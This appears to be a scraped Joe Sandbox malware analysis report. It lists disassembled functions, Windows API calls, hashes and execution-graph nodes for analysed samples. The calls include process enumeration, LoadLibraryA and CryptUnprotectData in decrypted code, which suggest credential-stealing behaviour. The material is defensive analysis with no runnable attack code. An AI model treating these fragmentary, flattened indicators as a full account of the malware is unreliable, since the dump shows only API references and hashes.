                                                              • Opcode Fuzzy Hash: 8a4126bd41ed080a17d0f6190365d979862204ac31dfcbaeabd411dcc8b8f8bb
                                                              • Instruction Fuzzy Hash: AAF08261721212AAEB106FB9AC4CFD726DC9FA0791B548111FA04D7084DAB0DCE08A72
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0022F6EC
                                                              • __isleadbyte_l.LIBCMT ref: 0022F71F
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00218D37,?,?,00000000,?,?,?,-00000001,00218D37,?), ref: 0022F750
                                                              • MultiByteToWideChar.KERNEL32(?,00000009,00218D37,00000001,?,00000000,?,?,?,-00000001,00218D37,?), ref: 0022F7BE
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                              • String ID:
                                                              • API String ID: 3058430110-0
                                                              • Opcode ID: e57867183c268a2d3f238cccff8de2b356f8a613e99c21c0a9b99c3096a313a3
                                                              • Instruction ID: 517bb76bdd95e38f8d378d3ce4333332c2985ffe9c8c44beceda155d0f902f47
                                                              • Opcode Fuzzy Hash: e57867183c268a2d3f238cccff8de2b356f8a613e99c21c0a9b99c3096a313a3
                                                              • Instruction Fuzzy Hash: B631A031A20266FFDB60DFE4E984DBA7BB9EF01310F148579E4658B1A1E730D960DB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00F28C90,00000000,00000000,00000000,00000000,00000000,?,?,?,0021656E,?,?,0021AFDF,00000007,?), ref: 0021671A
                                                              • HeapReAlloc.KERNEL32(00000000,?,?,?,0021656E,?,?,0021AFDF,00000007,?,?,00000000,00000000,?,?,?), ref: 00216721
                                                                • Part of subcall function 00218E6F: GetProcessHeap.KERNEL32(00000000,?,?,002185A8,00000000,00000000,?,?,00216A49,00000000,Failed while running the progress dialog.), ref: 00218E79
                                                                • Part of subcall function 00218E6F: HeapFree.KERNEL32(00000000,?,002185A8,00000000,00000000,?,?,00216A49,00000000,Failed while running the progress dialog.), ref: 00218E80
                                                              Strings
                                                              • Failed to realloc cleanup list buffer, xrefs: 00216735
                                                              • Failed to copy the file name, xrefs: 002166E0
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocFree
                                                              • String ID: Failed to copy the file name$Failed to realloc cleanup list buffer
                                                              • API String ID: 756756679-1190809427
                                                              • Opcode ID: f88db6b6e6dd4fd4a15440f6332de96cc7c704fd19f33b1e935e1fac1113a3cd
                                                              • Instruction ID: a925cee91de3b32c07093d685e1543392bae7c235baa16985747419221a2ff37
                                                              • Opcode Fuzzy Hash: f88db6b6e6dd4fd4a15440f6332de96cc7c704fd19f33b1e935e1fac1113a3cd
                                                              • Instruction Fuzzy Hash: 8D117FB5920245FFCB04DFA4ED8D8DEBBF9EB64714720806AE106F7250DA719A91CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DeleteFileW.KERNEL32(00000000,?,00000000,00000000,0023BEF0,?,?,00216488,00000000,00000000,74DF23A0,?,00215BF4), ref: 00219C43
                                                              • GetLastError.KERNEL32(?,?,00216488,00000000,00000000,74DF23A0,?,00215BF4), ref: 00219C53
                                                              • MoveFileExW.KERNEL32(00000000,00000000,00000004,?,?,00216488,00000000,00000000,74DF23A0,?,00215BF4), ref: 00219C64
                                                              • GetLastError.KERNEL32(?,?,00216488,00000000,00000000,74DF23A0,?,00215BF4), ref: 00219C6E
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLast$DeleteMove
                                                              • String ID:
                                                              • API String ID: 4226254011-0
                                                              • Opcode ID: 420831a0d8bfd2c650c27b33a814136b8f9cdd8d565e0fa18f8d7a624133e58c
                                                              • Instruction ID: 66bcce17b8f9af1ec9ba5fd8d3f30d4bff36f56cffb0b071d6ab9cfe0a2d74a8
                                                              • Opcode Fuzzy Hash: 420831a0d8bfd2c650c27b33a814136b8f9cdd8d565e0fa18f8d7a624133e58c
                                                              • Instruction Fuzzy Hash: E201763362020667E7204B65DD55BDA6ADD8FF4360F250036EB05E3000DA34CCE086E8
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: I5#$kQ"
                                                              • API String ID: 431132790-2201689415
                                                              • Opcode ID: fa4cbfc5489a44510bc72ce715c863e2f915752c96810e41fae28bc024ae820f
                                                              • Instruction ID: 7051553661b93ab6d431e1ae61fa5b7409b4d21d3f768b92d83aa03dfefdd27e
                                                              • Opcode Fuzzy Hash: fa4cbfc5489a44510bc72ce715c863e2f915752c96810e41fae28bc024ae820f
                                                              • Instruction Fuzzy Hash: 1C7109B4911B26EFCB10DFA9C5809AAFBF0BF08304F50895EE559A7711C770AA54CF91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00219A43: GetProcessHeap.KERNEL32(00000000,?,?,00218CCC,?,?,00000000), ref: 00219A4D
                                                                • Part of subcall function 00219A43: HeapSize.KERNEL32(00000000,?,00218CCC,?,?,00000000), ref: 00219A54
                                                              • lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00218CE0
                                                              • _vswprintf_s.LIBCMT ref: 00218D32
                                                                • Part of subcall function 00218836: GetProcessHeap.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,00218D82,00000000), ref: 00218852
                                                                • Part of subcall function 00218836: HeapReAlloc.KERNEL32(00000000,?,00218D82,00000000), ref: 00218859
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocSize_vswprintf_slstrlen
                                                              • String ID: z
                                                              • API String ID: 1418926380-1657960367
                                                              • Opcode ID: a901c5d17221f313e643933de71db5a5bf2a204b418bcfc43c62e99034cdff8d
                                                              • Instruction ID: 6390d492277152c066779bc37b5153d298c800d2085fcd2ceb65eafac94c0989
                                                              • Opcode Fuzzy Hash: a901c5d17221f313e643933de71db5a5bf2a204b418bcfc43c62e99034cdff8d
                                                              • Instruction Fuzzy Hash: 3331B031D20625EBCF219F7898C46DDFBF4AFB5350F344596E811EB250DA318EA09B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: _memmove
                                                              • String ID: @
                                                              • API String ID: 4104443479-2766056989
                                                              • Opcode ID: 66cd33f07f92f7bf903b75bd0112adf220fad0013f13d1fd7e762eae75a06d95
                                                              • Instruction ID: 4ede3aad3ac10eb44b677cedc2b4b99c2e5f84e2f2b99de08389e104c27fc488
                                                              • Opcode Fuzzy Hash: 66cd33f07f92f7bf903b75bd0112adf220fad0013f13d1fd7e762eae75a06d95
                                                              • Instruction Fuzzy Hash: A63181F6920219ABDB08DF64DC80AAA73A8FF44354F054659ED15AB700D734EF60CBD0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _vswprintf_s.LIBCMT ref: 00218C1D
                                                                • Part of subcall function 00219A43: GetProcessHeap.KERNEL32(00000000,?,?,00218CCC,?,?,00000000), ref: 00219A4D
                                                                • Part of subcall function 00219A43: HeapSize.KERNEL32(00000000,?,00218CCC,?,?,00000000), ref: 00219A54
                                                              • lstrlenW.KERNEL32(?,?,?,?,?), ref: 00218BCD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$ProcessSize_vswprintf_slstrlen
                                                              • String ID: z
                                                              • API String ID: 3730482531-1657960367
                                                              • Opcode ID: 4de46c3d6d40f6b2525f0d1cd369a4e90873315387c90635a080c4a7a073c664
                                                              • Instruction ID: 57fc21cf0bb922759f053d42a52e9d7c9f9fe73c82a33c14181335e9b12481bc
                                                              • Opcode Fuzzy Hash: 4de46c3d6d40f6b2525f0d1cd369a4e90873315387c90635a080c4a7a073c664
                                                              • Instruction Fuzzy Hash: F4312931A21206DBDB149F68C8C47DE77F1AFA4364F30452AE011DB150DF75CEA29BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: HX"$Y`"
                                                              • API String ID: 431132790-1307841931
                                                              • Opcode ID: ba56eb5478db0ebd6d6327fc5865333cccef4555bee38b9dd09cf26e9e168c73
                                                              • Instruction ID: 50e7cd75f81d3923d80c125f40cc35cf70d306e4577aeac8af066eef806d7b6d
                                                              • Opcode Fuzzy Hash: ba56eb5478db0ebd6d6327fc5865333cccef4555bee38b9dd09cf26e9e168c73
                                                              • Instruction Fuzzy Hash: 90117C70621BA1EFCB20DFA0C488B4ABBF8BF50304F54898CE4869B251C771E995CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 00234D38: __getptd.LIBCMT ref: 00234D3E
                                                                • Part of subcall function 00234D38: __getptd.LIBCMT ref: 00234D4E
                                                              • __getptd.LIBCMT ref: 002353CB
                                                                • Part of subcall function 0022A753: __getptd_noexit.LIBCMT ref: 0022A756
                                                                • Part of subcall function 0022A753: __amsg_exit.LIBCMT ref: 0022A763
                                                              • __getptd.LIBCMT ref: 002353D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: __getptd$__amsg_exit__getptd_noexit
                                                              • String ID: csm
                                                              • API String ID: 803148776-1018135373
                                                              • Opcode ID: bb629309e16acc5b64bc296b657b13c127ede069bedfd553f0c096afabd3e9ba
                                                              • Instruction ID: 8b2736913378010676b332697c3d725f872cd928145eda8b5f9b35f6860cb222
                                                              • Opcode Fuzzy Hash: bb629309e16acc5b64bc296b657b13c127ede069bedfd553f0c096afabd3e9ba
                                                              • Instruction Fuzzy Hash: 7F01D1B4821A268BCF3C9F60E4406ACF3B4AF10312FA4946DE58957661CB30D9F1CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 0022805B
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00225279,?,?,?,00000000,00228585,?,00000000,?,?,000000CC,00220145), ref: 0022808E
                                                                • Part of subcall function 00227F50: SetEvent.KERNEL32(00000000,00228082,00000000,00225279,?,?,?,00000000,00228585,?,00000000,?,?,000000CC,00220145), ref: 00227F52
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: EventH_prolog3ObjectSingleWait
                                                              • String ID: I5#
                                                              • API String ID: 31040200-2153569433
                                                              • Opcode ID: af8530cb830b334a9bc02e4946616d8612a707a4b9b41ff0c0a934c30ecb9a25
                                                              • Instruction ID: fdd08b0adbc560a649142f158043fd5e5e36e9a0a77d2bf00d935c2be2cc3e22
                                                              • Opcode Fuzzy Hash: af8530cb830b334a9bc02e4946616d8612a707a4b9b41ff0c0a934c30ecb9a25
                                                              • Instruction Fuzzy Hash: 21F06270429666FBDB10EFA4D90A388FB60BF10351F248794E56463691CBB0AE75CBE1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,7FFFFFFF,00000000,?,00218D82,00000000), ref: 00218852
                                                              • HeapReAlloc.KERNEL32(00000000,?,00218D82,00000000), ref: 00218859
                                                              • GetProcessHeap.KERNEL32(00000008,7FFFFFFF,00000000,?,00218D82,00000000), ref: 00218863
                                                              • HeapAlloc.KERNEL32(00000000,?,00218D82,00000000), ref: 0021886A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: 5fa76c6fcc6fdcb4508e7420019647dd61b2d16aada599631869d3e6b02a5b90
                                                              • Instruction ID: 6266364944368870344bb9325169945b6962d9a307473de3a74b71fcf93faa66
                                                              • Opcode Fuzzy Hash: 5fa76c6fcc6fdcb4508e7420019647dd61b2d16aada599631869d3e6b02a5b90
                                                              • Instruction Fuzzy Hash: 8DF03035110149EBC7114F65AC8CAE97ABAA7E13617758624F755C6050CE34C8E19764
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218802
                                                              • HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218809
                                                              • GetProcessHeap.KERNEL32(00000008,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218813
                                                              • HeapAlloc.KERNEL32(00000000,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 0021881A
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmp
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocProcess
                                                              • String ID:
                                                              • API String ID: 1617791916-0
                                                              • Opcode ID: ecb133090555068b1a9556f8a41f278d115efc8a94cfec6454a4ec5582bc6751
                                                              • Instruction ID: d4fa0b2b10a04cf326b06eedf0c82e9194c571396ef17a5a021b2e3e98e07e68
                                                              • Opcode Fuzzy Hash: ecb133090555068b1a9556f8a41f278d115efc8a94cfec6454a4ec5582bc6751
                                                              • Instruction Fuzzy Hash: 5BE09275220045EBC7101F68BCCCAFA35ABA7E03217758628F366C3040DE348CA1C761
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:17.4%
                                                              Dynamic/Decrypted Code Coverage:100%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:21
                                                              Total number of Limit Nodes:1
                                                              execution_graph 9418 7ffda159b176 9420 7ffda159b1c5 9418->9420 9419 7ffda159b29c CryptUnprotectData 9422 7ffda159b2e9 9419->9422 9420->9419 9421 7ffda159b233 9420->9421 9409 7ffda159bba8 9410 7ffda159bbb0 9409->9410 9412 7ffda159bbc1 9409->9412 9410->9412 9413 7ffda159ac10 9410->9413 9416 7ffda159ac29 9413->9416 9414 7ffda159ac2e 9414->9412 9415 7ffda159add0 LoadLibraryA 9417 7ffda159ae24 9415->9417 9416->9414 9416->9415 9417->9412 9405 7ffda159b25b 9406 7ffda159b281 CryptUnprotectData 9405->9406 9408 7ffda159b2e9 9406->9408 9423 7ffda159abc1 9427 7ffda159abdf 9423->9427 9424 7ffda159ac2e 9425 7ffda159add0 LoadLibraryA 9426 7ffda159ae24 9425->9426 9427->9424 9427->9425

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.978182552.00007FFDA1590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1590000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffda1590000_EQB4OREJ.jbxd
                                                              Similarity
                                                              • API ID: CryptDataUnprotect
                                                              • String ID:
                                                              • API String ID: 834300711-0
                                                              • Opcode ID: e048ae6f63121147f2131dcf2efd9c6acf93565761ab8877fabf9ab45d85b181
                                                              • Instruction ID: 5e29f1ae36e389b0b5ea56cc049a506563622b151e1203d615d6d50860a7b6c0
                                                              • Opcode Fuzzy Hash: e048ae6f63121147f2131dcf2efd9c6acf93565761ab8877fabf9ab45d85b181
                                                              • Instruction Fuzzy Hash: 95513C71A08A1C8FDB98DF18D845BE9B7F1FB98311F1082AAD40DE3255DE35A9858F81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              control_flow_graph 521 7ffda159b25b-7ffda159b2e7 CryptUnprotectData 524 7ffda159b2e9 521->524 525 7ffda159b2ef-7ffda159b383 call 7ffda159b384 521->525 524->525
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.978182552.00007FFDA1590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1590000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffda1590000_EQB4OREJ.jbxd
                                                              Similarity
                                                              • API ID: CryptDataUnprotect
                                                              • String ID:
                                                              • API String ID: 834300711-0
                                                              • Opcode ID: b2dc26ae67257d0794b5ef5b73c488ffa6867c5f139ca48aa9563bd05408e05d
                                                              • Instruction ID: aa8f86d555abf184ce1932cf802e3a01e7aca18137b3bc7224cedae56b5a19e7
                                                              • Opcode Fuzzy Hash: b2dc26ae67257d0794b5ef5b73c488ffa6867c5f139ca48aa9563bd05408e05d
                                                              • Instruction Fuzzy Hash: 70315431918A1C8FEB94DF58D845BE9B3B1FF98311F1082AAD44D97256CB34A985CFC2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.978182552.00007FFDA1590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDA1590000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffda1590000_EQB4OREJ.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID:
                                                              • API String ID: 1029625771-0
                                                              • Opcode ID: c5205e68091857a5836c6635e503cecabdf55b9480661d791708870f654000a5
                                                              • Instruction ID: 5bd729602742822acf793636b48e00c5509dbc1bbaced48c13414c5677da6c9b
                                                              • Opcode Fuzzy Hash: c5205e68091857a5836c6635e503cecabdf55b9480661d791708870f654000a5
                                                              • Instruction Fuzzy Hash: 5CA1E630A0DA894FDB59DB2888657F937F5EF45310F18417AE44DC73A3DE29E8428B92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Execution Graph

                                                              Execution Coverage:12.9%
                                                              Dynamic/Decrypted Code Coverage:5.4%
                                                              Signature Coverage:0.5%
                                                              Total number of Nodes:1659
                                                              Total number of Limit Nodes:55
76460->76462 76463 6c4a7c4b 76461->76463 76461->76465 76462->76461 76462->76465 76620 6c4a7f08 GetLastError 76463->76620 76465->76426 76467 6c4a846f 76466->76467 76467->76432 76468->76431 76469->76434 76508 6c4b265b 76470->76508 76472 6c4a5590 GetCurrentProcessId 76509 6c48f197 76472->76509 76474 6c4a55ae ctype 76512 6c48efe2 CreateToolhelp32Snapshot 76474->76512 76477 6c48f197 109 API calls 76478 6c4a5609 ctype 76477->76478 76522 6c49eb56 76478->76522 76481 6c4a56a7 76495 6c4a57fb ctype 76481->76495 76526 6c48f07e 76481->76526 76482 6c48efe2 9 API calls 76483 6c4a5642 76482->76483 76485 6c48f07e 106 API calls 76483->76485 76488 6c4a564c 76485->76488 76486 6c4a56bb 76489 6c49ea8d 97 API calls 76486->76489 76487 6c48f0c8 99 API calls 76487->76481 76490 6c49ea8d 97 API calls 76488->76490 76493 6c4a56db ctype 76489->76493 76491 6c4a566c ctype 76490->76491 76491->76481 76491->76487 76492 6c4a5716 76494 6c48f07e 106 API calls 76492->76494 76492->76495 76493->76492 76529 6c48f0c8 76493->76529 76496 6c4a572a 76494->76496 76495->76439 76498 6c49ea8d 97 API calls 76496->76498 76499 6c4a574a ctype 76498->76499 76501 6c4a5785 76499->76501 76503 6c48f0c8 99 API calls 76499->76503 76500 6c4a57ab GetTempPathW 76504 6c4a57be 76500->76504 76501->76495 76501->76500 76539 6c4a827a 66 API calls 76501->76539 76503->76501 76504->76495 76505 6c48f0c8 99 API calls 76504->76505 76506 6c4a57e2 76505->76506 76506->76495 76540 6c4a827a 66 API calls 76506->76540 76508->76472 76541 6c4a5848 76509->76541 76511 6c48f1ca 76511->76474 76513 6c48f00b _memset 76512->76513 76514 6c48f067 76512->76514 76517 6c48f01d Process32FirstW 76513->76517 76515 6c4a87c1 __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 5 API calls 76514->76515 76516 6c48f075 76515->76516 76516->76477 76518 6c48f03a 76517->76518 76519 6c48f058 FindCloseChangeNotification 76518->76519 76520 6c48f045 Process32NextW 76518->76520 76519->76514 76520->76518 76523 
6c49eb61 76522->76523 76575 6c4a9669 76523->76575 76586 6c4a54b3 76526->76586 76528 6c48f0ab 76528->76486 76530 6c48f0d4 __EH_prolog3 76529->76530 76531 6c4a811c 97 API calls 76530->76531 76532 6c48f106 76531->76532 76533 6c48f123 76532->76533 76596 6c4a827a 66 API calls 76532->76596 76595 6c48f0b7 GetTempFileNameW 76533->76595 76539->76500 76540->76495 76544 6c4a5854 __EH_prolog3 76541->76544 76542 6c4a599f 76557 6c49f0e8 76542->76557 76544->76542 76546 6c4a58ae GetTokenInformation 76544->76546 76545 6c4a59b6 76561 6c49f092 76545->76561 76548 6c4a5999 FindCloseChangeNotification 76546->76548 76555 6c4a58c7 _strnlen 76546->76555 76548->76542 76549 6c4a59c9 ctype 76550 6c49e8e8 106 API calls 76549->76550 76556 6c4a59e3 ctype 76549->76556 76550->76556 76551 6c4a5912 GetTokenInformation 76551->76555 76553 6c4a82d1 66 API calls 76553->76555 76554 6c4a5987 ctype 76554->76548 76555->76548 76555->76551 76555->76553 76555->76554 76565 6c4a79b9 66 API calls 76555->76565 76556->76511 76558 6c49f0f4 __EH_prolog3 76557->76558 76566 6c4a38c5 76558->76566 76560 6c49f130 ctype 76560->76545 76562 6c49f09e __EH_prolog3 76561->76562 76563 6c4a38c5 97 API calls 76562->76563 76564 6c49f0d6 ctype 76563->76564 76564->76549 76565->76555 76567 6c4a82d1 66 API calls 76566->76567 76568 6c4a38df 76567->76568 76569 6c4a8923 _memcpy_s 66 API calls 76568->76569 76570 6c4a38f0 76569->76570 76571 6c4a8923 _memcpy_s 66 API calls 76570->76571 76572 6c4a3900 76571->76572 76573 6c4a830d 97 API calls 76572->76573 76574 6c4a390e 76573->76574 76574->76560 76576 6c4a9678 76575->76576 76577 6c4a96e1 76575->76577 76582 6c49eb79 76576->76582 76583 6c4ab570 66 API calls __getptd_noexit 76576->76583 76585 6c4a9561 78 API calls 4 library calls 76577->76585 76580 6c4a9684 76584 6c4ab514 11 API calls __wctomb_s_l 76580->76584 76582->76482 76582->76491 76583->76580 76584->76582 76585->76582 76588 6c4a54bf __EH_prolog3 76586->76588 76587 6c49e8e8 106 API calls 76590 6c4a556c ctype 76587->76590 76591 6c4a5519 
